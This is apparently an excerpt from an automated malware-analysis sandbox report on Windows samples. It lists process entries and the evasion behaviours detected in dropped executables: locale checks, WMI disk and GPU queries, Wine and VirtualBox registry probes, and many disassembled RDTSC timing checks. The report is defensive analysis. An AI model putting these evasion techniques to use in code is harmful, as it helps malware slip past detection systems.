Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\1000003002\ead6a72944.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\1000003002\ead6a72944.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\1000003002\ead6a72944.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: ABEC99 second address: ABEC9E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C4A265 second address: C4A280 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A52h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C496BA second address: C496CF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jns 00007F0E948C9FB6h 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c push eax 0x0000000d jl 00007F0E948C9FB6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C49817 second address: C4984A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A4Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007F0E94F51A5Ch 0x0000000f jmp 00007F0E94F51A56h 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C4984A second address: C4986D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FC2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jo 00007F0E948C9FB6h 0x00000015 pop ecx 0x00000016 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C499D2 second address: C499F9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0E94F51A51h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b je 00007F0E94F51A4Eh 0x00000011 jg 00007F0E94F51A46h 0x00000017 push eax 0x00000018 pop eax 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C499F9 second address: C49A09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E948C9FBAh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C4C924 second address: C4C93A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A52h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C4C93A second address: C4C94D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0E948C9FBEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C4C9A9 second address: C4C9AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C4C9AE second address: C4C9DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0E948C9FC1h 0x00000008 jg 00007F0E948C9FB6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jnp 00007F0E948C9FC1h 0x0000001a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C4C9DF second address: C4C9E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C4C9E6 second address: C4CA19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 mov dx, 3EE4h 0x0000000c push 00000000h 0x0000000e mov edx, dword ptr [ebp+122D3A9Eh] 0x00000014 jnl 00007F0E948C9FC0h 0x0000001a push D9332C49h 0x0000001f push eax 0x00000020 push edx 0x00000021 push edx 0x00000022 jnp 00007F0E948C9FB6h 0x00000028 pop edx 0x00000029 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C4CBBF second address: C4CBCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C4CBCB second address: C4CBDD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FBEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C4CC32 second address: C4CC63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov dword ptr [ebp+122D1BC3h], eax 0x00000011 or di, 0107h 0x00000016 push 00000000h 0x00000018 mov dword ptr [ebp+122D3801h], ecx 0x0000001e push 836EBDB3h 0x00000023 push eax 0x00000024 push edx 0x00000025 jo 00007F0E94F51A4Ch 0x0000002b ja 00007F0E94F51A46h 0x00000031 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C4CC63 second address: C4CC6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C4CC6A second address: C4CCC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 add dword ptr [esp], 7C9142CDh 0x0000000e mov dword ptr [ebp+122D1C93h], edi 0x00000014 push 00000003h 0x00000016 mov ecx, dword ptr [ebp+122D38F6h] 0x0000001c call 00007F0E94F51A57h 0x00000021 ja 00007F0E94F51A4Ch 0x00000027 mov edi, dword ptr [ebp+122D39DAh] 0x0000002d pop edx 0x0000002e push 00000000h 0x00000030 add dword ptr [ebp+122D3801h], edx 0x00000036 push 00000003h 0x00000038 jne 00007F0E94F51A4Ch 0x0000003e push 7A6F6830h 0x00000043 pushad 0x00000044 pushad 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C4CCC9 second address: C4CD0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E948C9FC5h 0x00000009 popad 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f popad 0x00000010 popad 0x00000011 add dword ptr [esp], 459097D0h 0x00000018 mov edx, dword ptr [ebp+122D38C2h] 0x0000001e lea ebx, dword ptr [ebp+1246188Ah] 0x00000024 sub dword ptr [ebp+122D1CC7h], ecx 0x0000002a push eax 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e pushad 0x0000002f popad 0x00000030 push ebx 0x00000031 pop ebx 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C5EF42 second address: C5EF5A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A4Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a js 00007F0E94F51A4Eh 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6B889 second address: C6B8C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F0E948C9FBEh 0x0000000b push eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 jmp 00007F0E948C9FC3h 0x00000015 popad 0x00000016 push ebx 0x00000017 push esi 0x00000018 jp 00007F0E948C9FB6h 0x0000001e pop esi 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6B8C5 second address: C6B8C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6BBB3 second address: C6BBB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6BBB9 second address: C6BBBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6BBBD second address: C6BBC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6BD07 second address: C6BD20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A4Fh 0x00000007 jng 00007F0E94F51A46h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6BFCB second address: C6BFEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F0E948C9FBBh 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d popad 0x0000000e pop ebx 0x0000000f jnc 00007F0E948C9FD8h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6BFEC second address: C6BFFE instructions: 0x00000000 rdtsc 0x00000002 js 00007F0E94F51A46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007F0E94F51A46h 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6BFFE second address: C6C002 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6C11D second address: C6C13C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F0E94F51A46h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0E94F51A52h 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6C2F7 second address: C6C302 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F0E948C9FB6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6C302 second address: C6C31B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0E94F51A52h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6C5A7 second address: C6C5B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F0E948C9FB6h 0x00000009 jl 00007F0E948C9FB6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C34479 second address: C3447D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C3447D second address: C34483 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6CB59 second address: C6CB5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6CB5D second address: C6CB77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0E948C9FBDh 0x00000008 jc 00007F0E948C9FB6h 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6D0DB second address: C6D10C instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0E94F51A46h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0E94F51A58h 0x00000014 jmp 00007F0E94F51A4Ah 0x00000019 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6D10C second address: C6D112 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6D112 second address: C6D116 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6D4DE second address: C6D4E8 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0E948C9FBEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6D4E8 second address: C6D549 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F0E94F51A56h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jc 00007F0E94F51A52h 0x00000014 jmp 00007F0E94F51A4Ch 0x00000019 push esi 0x0000001a jmp 00007F0E94F51A57h 0x0000001f pop esi 0x00000020 pushad 0x00000021 jmp 00007F0E94F51A54h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6D7EA second address: C6D7F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F0E948C9FB6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6D7F7 second address: C6D7FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C70CE1 second address: C70CE6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C70CE6 second address: C70D31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jnc 00007F0E94F51A5Ch 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 jmp 00007F0E94F51A58h 0x00000017 mov eax, dword ptr [eax] 0x00000019 pushad 0x0000001a jo 00007F0E94F51A4Ch 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C70D31 second address: C70D54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E948C9FBCh 0x00000009 popad 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007F0E948C9FBCh 0x00000016 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6FBB9 second address: C6FBBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C70E1A second address: C70E21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C777CA second address: C777D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C777D0 second address: C777D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C77950 second address: C77954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C77A9E second address: C77AB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E948C9FBFh 0x00000009 js 00007F0E948C9FB6h 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C77AB7 second address: C77AC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C77AC1 second address: C77ACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F0E948C9FB6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C77ACB second address: C77ADF instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0E94F51A46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C77ADF second address: C77AE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C77AE3 second address: C77AE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C77AE9 second address: C77AEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C7801D second address: C78021 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C78021 second address: C78052 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FC3h 0x00000007 pushad 0x00000008 jmp 00007F0E948C9FC7h 0x0000000d push edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C78052 second address: C78058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
